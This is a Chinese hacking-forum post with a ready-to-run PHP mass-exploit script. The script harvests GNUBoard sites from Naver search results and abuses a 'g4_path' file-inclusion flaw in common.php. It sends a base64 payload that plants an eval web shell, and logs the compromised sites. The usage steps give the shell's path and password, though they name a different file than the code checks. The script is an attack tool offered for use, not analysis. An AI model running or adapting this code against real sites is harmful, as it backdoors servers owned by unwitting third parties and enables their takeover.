摘自：红科网安
http://bbs.honkwin.com

1.本机搭建PHP环境
2.将EXP程序保存为akt.php
3.CMD下执行php akt.php
4.产生的akt.txt中记录成功URL
5.http://目标URL/data/hardison.php   密码：akteam   用PHP连接

EXP:

复制代码 <?php echo"   +----------------------------------------------------------------+\r\n"; echo"                   http://bbs.honkwin.com\r\n"; echo"   +----------------------------------------------------------------+\r\n"; for ($ii=1;$ii<=99;$ii++) { $c=(int)$ii*10+1; $a="web.search.naver.com"; $b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10   &&qvt=0&sm=tab_pge"; get($a,$b);   } function get($host,$file) {                         $fp = fsockopen($host, 80, $errno, $errstr, 10);              if (!$fp) {                  echo "SocketError: $errstr ($errno)\n";                  return false;              }              $get = "GET $file HTTP/1.1\r\n";              $get .= "Host: $host\r\n";              $get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";              $get .= "Referer: http://$host\r\n";              $get .= "Connection: Close\r\n";                          $get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";              fwrite($fp, $get);              $response=stream_get_contents($fp);              preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);              for ($i=0;$i<count($put[0]);$i++)                          {                          $a=(int)$i*3;                                                                        fuck($put[0][$a]);                          //echo count($put[0]);                          //print_r($put[0]);                          //fuck($put[0][$i]);                                                 break;                                                 }                                                fclose($fp);                                                } function fuck($ok) { $a=preg_replace('(bbs\/board.php)','',$ok); $file=$a."common.php?g4_path=/tmp2345"; $xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL2hhcmRpc29uLnBocCcsJ3crJyksJzw/   cGhwIEBldmFsKCRfUE9TVFtob29lZHVdKTtlY2hvICJoYXJkaXNvbiBiaWcgYmlnICI7Pz4nKTs/Pg=="; $shell=$a."data/akteam.php"; $target=parse_url($ok); $sitepath=$target['host']; $xx=@file_get_contents($file); if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx)) { print $sitepath."     Vulnerability yes"."\r\n"; @file_get_contents($xxx); $oksehll=@file_get_contents($shell); if(!eregi("(\\02345)",$xx)) { print $sitepath."     ok"."\r\n"; } if (eregi("(akteam)",$oksehll)) { print $shell." pass:akteam"."\r\n"; $axx="\r\n".$shell; $sh=fopen('akt.txt',"a+"); fwrite($sh,$axx); fclose($sh); }   } else { print $sitepath."     Vulnerability no"."\r\n"; } }   ?>